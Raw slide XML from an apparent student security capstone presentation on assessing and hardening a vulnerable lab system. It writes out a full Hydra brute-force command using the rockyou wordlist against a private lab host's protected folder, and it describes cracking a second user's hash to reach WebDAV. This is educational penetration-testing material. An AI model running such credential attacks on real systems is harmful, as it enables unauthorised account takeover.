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
      <p:font typeface="Roboto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080070-8182-4C4D-ABE0-365803A54136}">
  <a:tblStyle styleId="{4D080070-8182-4C4D-ABE0-365803A541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regular.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.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RobotoLight-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RobotoLight-italic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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c75b44f1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c75b44f1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c75b44f1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c75b44f1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c75b44f1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c75b44f1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c75b44f1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c75b44f1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0" name="Shape 130"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Google Shape;13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2" name="Google Shape;132;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237100"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1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1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5" name="Shape 135"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;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138" name="Google Shape;13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1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0" name="Google Shape;14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1" name="Google Shape;141;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42" name="Google Shape;142;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3581700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-311150" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-298450" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-298450" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-298450" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-298450" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-298450" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-298450" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buSzPts val="11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43" name="Shape 143"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Google Shape;14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15"/>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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="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49" name="Shape 149"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="150" name="Google Shape;150;p16"/>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51" name="Google Shape;151;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="66747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52" name="Google Shape;152;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1245800"/>
            <a:ext cx="6699600" cy="3897600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-311150" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-298450" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-298450" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-298450" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-298450" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-298450" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-298450" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-298450" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p16"/>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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="10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54" name="Google Shape;154;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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1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 name="Google Shape;15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57" name="Google Shape;157;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6"/>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59" name="Shape 159"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="160" name="Google Shape;160;p17"/>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161" name="Google Shape;161;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 name="Google Shape;162;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1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 name="Google Shape;165;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66" name="Google Shape;166;p1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167" name="Google Shape;167;p17"/>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168" name="Google Shape;168;p17"/>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170" name="Google Shape;170;p17"/>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72" name="Shape 172"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Google Shape;17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4" name="Google Shape;174;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75" name="Google Shape;175;p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76" name="Google Shape;176;p1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hyperlink" Target="http://www.crackstation.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192.168.1.105"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hyperlink" Target="http://192.168.1.10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274350" y="936450"/>
            <a:ext cx="8595300" cy="79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D7E74"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="1D7E74"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="1D7E74"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="1D7E74"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ssessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="1D7E74"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="1D7E74"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="1D7E74"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="1D7E74"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Emma Franco &amp; Gloria Morelos</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="1D7E74"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;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Exploitation: Weak Password &amp; No Failed Password Lockout</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p28"/>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89" name="Google Shape;289;p2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Cracked password for </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/secret_folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> by executing a Hydra brute force attack using the information we obtained from the ashton.txt file and a ‘rockyou’ dictionary. The dictionary was used to quickly attempt various common passwords until one was successful.</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291" name="Google Shape;291;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="292" name="Google Shape;292;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93" name="Google Shape;293;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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="295" name="Google Shape;295;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96" name="Google Shape;296;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Cracked password for user ‘Ashton’ and gained access to /secret_folder/.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Once inside </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/secret_folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> discovered access data for </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/webdav/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. Cracked hash for user ‘Ryan’ and gained access to</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> /webdav/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="Google Shape;300;p2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01" name="Google Shape;301;p2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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Evidence</a:t>
            </a:r>
            <a:endParaRPr b="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The following command produced Ashton’s password:</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100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr i="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r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="11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rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Full screenshots on next slide.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="9E9E9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i="1" sz="1100">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304" name="Google Shape;304;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477375" y="3632350"/>
            <a:ext cx="2295299" cy="3384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Evidence of Vulnerability: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2177"/>
              <a:t>Weak Password &amp; No Failed Password Lockout</a:t>
            </a:r>
            <a:endParaRPr sz="2177"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p29"/>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311" name="Google Shape;311;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1997225" y="882375"/>
            <a:ext cx="6189700" cy="912575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="312" name="Google Shape;312;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1997216" y="2028263"/>
            <a:ext cx="6817384" cy="1034262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="313" name="Google Shape;313;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-5699" l="0" r="0" t="5700"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1997225" y="3295825"/>
            <a:ext cx="3617848" cy="1494550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3464825" y="10917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5" name="Google Shape;315;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="806175"/>
            <a:ext cx="1566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1</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Crack Ashton’s password using Hydra brute force attack</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="1956900"/>
            <a:ext cx="1566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2</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Once in </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
